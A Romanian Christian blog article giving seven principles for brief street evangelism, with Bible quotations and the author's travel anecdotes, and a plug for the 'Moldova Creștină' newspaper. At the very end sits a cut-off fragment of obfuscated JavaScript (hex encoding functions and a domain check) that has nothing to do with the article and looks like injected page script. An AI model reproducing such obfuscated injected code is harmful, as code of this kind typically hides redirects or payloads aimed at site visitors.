Cum poți spune Evanghelia în 3-5 minute? (7 principii)

 Întrebare: 

Cum să fac evanghelizare de la om la om în 3-5 minute? Vreau să folosesc timpul cât stau la stație, în rând la magazin, în troleibuz, ca să vestesc Evanghelia, dar mi-e greu să încep. Cum să fac aceasta și să transmit un mesaj complet al Scripturii în 3-5 minute?

Cum poți spune Evanghelia în 3-5 minute? (7principii)Trăim într-o lume a instantaneului când vrem toate lucrurile să le facem repede și bine. Totuși, Evanghelia este ceva mult mai serios decât ai putea să o explici în 3-5 minute. Aceste 3 minute sunt bune pentru a începe discuția, dar dacă vrei calitate, ceva care să dureze, atunci ai nevoie de timp. Fratele Costel Oglice, într-o lecție de studiu inductiv, a comparat stejarul cu castravetele, arătând că castravetele crește repede, dacă îi pui și o nuia, se poate întinde și crește foarte înalt într-un timp foarte scurt, dar după ce dă soarele și se schimbă anotimpul, planta se usucă și dispare. Pe când stejarul, ia timp să crească, dar el rămâne și este durabil. Tot așa este și cu evanghelizarea și ucenicia. Dacă vrei ca lucrurile să se întâmple instantaneu, te-ai putea pomeni că tot atât de repede și să dispară ceea ce încerci să clădești. Nicidecum nu vreau să spun că nu trebuie să folosiți timpul în stație, în troleibuz sau alte ocazii pe care le dă Domnul ca să le folosim. Vreau să spun  să nu vă limitați doar la aceste 3-5 minute, crezând că aceasta este de ajuns pentru Evanghelizare.

Totuși, pentru a folosi înțelept acest timp, vreau să vă dau câteva principii care mă rog să vă ajute:

Principiul nr. 1 – Fii comunicabil

Evanghelia trebuie  spusă, nu numai arătată. Trebuie să trăim într-un mod vrednic de chemarea noastră, dar Evanghelia trebuie spusă și în cuvinte. Scriptura ne arată aceasta foarte clar când zice:

Dar cum vor chema pe Acela în care n-au crezut? Şi cum vor crede în Acela despre care n-au auzit? Şi cum vor auzi despre El fără propovăduitor?(Romani 10:14)

Cum poți spune Evanghelia dacă taci sau dacă nu ești predispus să vorbești și să intri în contact cu oamenii? Un creștin trebuie să știe să înceapă și să întrețină o discuție momentan. Priviți cât de repede intră copiii în contact cu alți copii. De multe ori comunică cu acei copii care nici măcar nu vorbesc limba lor, dar se joacă și se înțeleg. Tot așa trebuie să fim și noi. Dacă înțelegi cât de important este să spui la oameni Evanghelia, atunci învață să fii comunicabil și aceasta va fi o platformă foarte bună pentru al doilea principiu și anume…

Principiul nr.2 – Ascultă și răspunde la nevoie cu Evanghelia

Vorbind, vei auzi cu siguranță anumite lucruri la care Evanghelia are răspuns. De exemplu, stând în rând la stație, de obicei, oamenii se îmbulzesc și dau buzna ca să intre cât mai repede. Dacă începi să vorbești cu cineva de lângă tine, întreabă-te cum ai putea lega situația aceasta de Evanghelie? De exemplu, ai putea lega această situație de cuvintele Domnului Isus care a zis:

… Împărăţia cerurilor se ia cu năvală, şi cei ce dau năvală pun mâna pe ea. (Matei 11:12)

Ce bună ilustrație ar fi aceasta pentru cel ce privește cum oamenii se îmbulzesc și să înțeleagă că exact așa trebuie să se grăbească să dea năvală ca să intre în împărăția lui Dumnezeu. Și așa orice împrejurare o poți lega de Evanghelie, dar nu vei putea fi bun în acest principiu dacă următorul este neglijat.

Principiul nr. 3 – Studiază profund Scriptura ca să ai un răspuns la tot ce vezi în jur

Când studiem Scriptura, noi ne transformăm în lumina celor învățate, dar totodată acumulăm și cunoștințe biblice pentru viața de zi cu zi. Într-un fel, fiecare creștin are o concordanță biblică în mintea lui. Cu cât este mai bună această concordanță, cu atât mai rapid vei putea să reacționezi la nevoile din jurul tău cu Evanghelia. Dacă faci cunoștință la stație cu un sportiv, deodată îți vei aduce aminte ce spune Biblia despre atleți. Dacă faci cunoștință cu un tată, te întrebi ce spune Biblia despre tați sau părinți- copii. Dacă vezi un cerșetor, te gândești ce spune Biblia despre ei. Dacă vezi un om ce plânge, te gândești cum ai putea să-l mângâi, spunându-i Evanghelia. Deci, la orice împrejurare, la orice cuvânt auzit, spus, tu poți lega cu Evanghelia. Totuși, nu studia Biblia doar pentru a avea cunoștințe din ea, ci lasă Scriptura în primul rând să te transforme pe tine. Când vei fi plin de Cuvântul lui Dumnezeu, el va curge din tine, vei scoate din vistieria inimii tale ceea ce ai, așa cum a spus Domnul Isus:

Omul bun scoate lucruri bune din vistieria bună a inimii lui, iar omul rău scoate lucruri rele din vistieria rea a inimii lui; căci din prisosul inimii vorbeşte gura.(Luca 6:45)

Nu trebuie să stai ore întregi ca să te gândești cum să spui Evanghelia unei persoane ce stă lângă tine. Dacă rămâi în Cuvântul lui Dumnezeu zilnic, atunci el curge ca un râu din inima și gura ta. Personal, studiu inductiv mă ajută foarte mult. Toate cărțile de studiu inductiv sunt concepute în așa fel ca cel ce studiază să-și formeze o disciplină de a studia zilnic. Vă motivez să vă înscrieți la sesiunile de studiu inductiv, unde veți învăța cum să studiați Biblia după această metodă, dar și cum să predați interesant și pe înțelesul altora.

Principiul nr. 4 – Observă ce oportunități îți dă Dumnezeu în orice moment

Eram într-o țară musulmană și am intrat la bancă să schimb bani. La ghișeu era o femeie și un bărbat. Bărbatul a luat banii, mi-a dat chitanța și banii. Când am numărat, am văzut că el mi-a dat mult mai mult decât i-am dat eu să-mi schimbe. Atunci l-am întrebat încă o dată câți bani trebuia el să-mi dea. Și doar atunci el și-a dat seama că mi-a dat cu vreo 50$ mai mult. Femeia de lângă el a început să-l certe și el, speriat, nu știa ce să spună. O femeie din spate, când a văzut gestul meu, a zis: “Ce om cinstit!”. Știind contextul în care mă aflam și că musulmanii nu au o prea bună părere despre creștini, l-am întrebat pe bărbatul de la ghișeu: “Știi de ce ți-am întors banii și nu am plecat?” El a zis: “De ce?” Atunci i-am zis cu glas tare să audă toți: “Pentru că Îl iubesc pe Isus și El este Domnul meu care mă învață să nu fur, să nu mint, ci să ascult și să cred în El”. Toți cei care erau în sala aceea au muțit și nu puteau spune nimic împotrivă. Sunt sigur că după ce am plecat au discutat ceva. Nu puteam să stau mai mult la ghișeu, căci rândul era mare, dar sunt sigur că din aceste cuvinte l-am pus pe el și pe toți din jur pe gânduri. A înțeles el Evanghelia în acel moment? Nu cred, dar noi trebuie să învățăm să folosim orice ocazie. Astfel oamenii aud, se pun pe gânduri și apoi doresc să afle mai multe despre Domnul Isus.

O altă dată zburam cu avionul din Ho Chi Minh spre Bankok. Când m-am așezat în avion, am făcut deodată cunoștință cu bărbatul care era lângă mine și am început să vorbesc cu el. Apropo, un alt sfat este ca totdeauna să începi discuția cu persoana de lângă tine, deodată, căci cu cât lași timpul mai mult, cu atât mai greu va fi să începi discuția. Discutând cu el, la un moment dat el a spus: “În zilele noastre este foarte mult haos pe pământ”. Auzind aceste cuvânte, am înțeles că anume aceasta este oportunitatea pe care mi-o dă Domnul ca să-i vorbesc despre zilele sfârșitului și de acolo să-l duc la Hristos și nevoia de a se împăca cu El. Vorbeam tare ca să mă audă nu numai el, ci și toți din jur. Pentru că ședeam chiar la ieșirea de urgență, am fost plăcut surprins să văd că stewardesa care stătea în fața noastră, auzind subiectul, nu dorea să se ridice și să plece, stătea și ne asculta. Când m-am întors în spate, oamenii din spatele nostru stăteau și ascultau cu atenție ceea ce îi spun acestui bărbat. Totuși, acolo nu am avut doar 3-5 minute, ci cel puțin o oră. De aceea a fost un foarte bun timp când am putut să-i deschid Scriptura, să-i dau să citească, să pun întrebări ca omul să poată lua o decizie.

Îmi aduc aminte cum Șirinai Dosova, care este și profesoară în cadrul Institutului de Studii Biblice Inductive, spunea că odată a intrat în ascensor și după ea a intrat și un bărbat. Ea, dorind să apese pe buton, îl întreabă: “La ce etaj mergeți?”. Bărbatul îi răspunde: “Etajul 4”. Ea, apăsând pe butonul nr.4, se întoarce spre el și îl întreabă: “Dar dvs știți că în Biblie sunt 4 Evanghelii?” și de aici discuția a început.

Deci, fii alert și stai cu ochii deschiși pentru a nu scăpa nicio ocazie, nicio oportunitate pe care ți-o dă Dumnezeu.

Principiul nr. 5 – Nu fi ca martorii lui Iehova

După mine, cea mai bună evanghelizare este aceea care are loc natural, fără să forțezi lucrurile. Oamenilor nu le place când îi forțezi să te asculte sau te bagi în sufletul lor. Nici măcar Domnul Isus nu Se bagă în sufletul omului cu sila. Bineînțeles că fiecare caz poate fi diferit, dar de cele mai multe ori, dacă omul nu dorește să te asculte, nu face sens să îl forțezi să te asculte, căci tot ce vei spune tu mai departe nu va fi primit… Dar, dacă înveți să aplici sfaturile de mai sus, atunci discuția ar trebui să se nască natural, într-o ambianță de prietenie și atunci omul nu se simte forțat, ci este predispus să te asculte.

Principiul nr. 6 – Roagă-te pentru îndrăzneală

 

Când biserica primară era amenințată și intimidată de către preoți și farisei, întreaga biserică s-a rugat astfel:

Şi acum, Doamne, uită-Te la ameninţările lor, dă putere robilor Tăi să* vestească Cuvântul Tău cu toată îndrăzneala şi întinde-Ţi mâna, ca* să se facă tămăduiri, minuni şi semne prin** Numele Robului† Tău celui sfânt, Isus.” După ce s-au rugat ei, s-a* cutremurat locul unde erau adunaţi; toţi s-au umplut de Duhul Sfânt şi** vesteau Cuvântul lui Dumnezeu cu îndrăzneală. (Fapte 4:29-31)

Pentru a spune oamenilor Evanghelia, ai nevoie de curaj. Ai nevoie să calci peste rușine, frică și să vorbești, de aceea continuă să te rogi ca Dumnezeu să-ți dea îndrăzneală ca să vorbești Cuvântul Lui cu multă putere.

Principiul nr. 7 – Folosește ziarul „MOLDOVA CREŞTINĂ” sau invitații la diferite evenimente

Ziarul Moldova Creştină poate fi o unealtă foarte bună pentru a începe o discuție în stație, în troleibuz, în magazin sau oriunde ai ocazia. Dacă nu știi cum să începi discuția, începe-o prin a dărui oamenilor un ziar. Te sfătuiesc ca înainte de a-l dărui, mai întâi să faci o privire de ansamblu asupra articolelor din ziar. Știind ce teme se abordează în numărul acesta, vei ști mai bine cum să-l prezinți și cum să-i îndemni pe oameni să-l citească. La sfârșitul ziarului, de obicei, este și o lecție de studiu inductiv și poți să-i motivezi pe oameni să o studieze. Dacă omul este deschis, atunci cea mai bună evanghelizare va fi să te așezi și să începi să faci lecția de studiu din ziar împreună cu el.

De asemenea, poți folosi invitații la tabere, conferințe sau alte evenimente importante, care doar oferindu-le oamenilor deja spargi gheața și poți începe discuția cu ei.

Așa cum am spus și la început, nu trebuie să te concentrezi doar pe 3-5 minute. Acest timp poate fi un pod spre ceva mai serios. Ocazii ca și acestea trebuie de folosit  pentru a semăna un gând, o motivație sau a-l face pe om curios să afle mai multe. Astfel, după aceasta, fii gata să te întâlnești cu cei ce sunt interesați și să studiezi Scriptura împreună cu ei, ceea ce îi va conduce pe oameni la pocăință. Și încă ceva important: faptul că poți învăța să spui în 3 minute o combinație de cuvinte care după înțelegerea ta cuprinde tot mesajul Evangheliei, nu  înseamnă neapărat că oamenii vor și înțelege ceea ce spui. Nu crede că ceea ce înțelegi tu, înțeleg și ei. De cele mai multe ori ia timp. Când o persoană ia decizia să-L urmeze pe Isus, este o decizie foarte serioasă, este un legământ pe care îl încheie. Este un drum pe care intră și cale de întoarcere nu există. Înțelegând imporanța acestei decizii, trebuie să îi ajuți pe oameni să înțeleagă ce înseamnă să primești Evanghelia și să alegi să devii ucenicul lui Isus.

Dumnezeu să ne facă pe fiecare niște martori vii ai Lui!

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "moldovacrestina.md"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e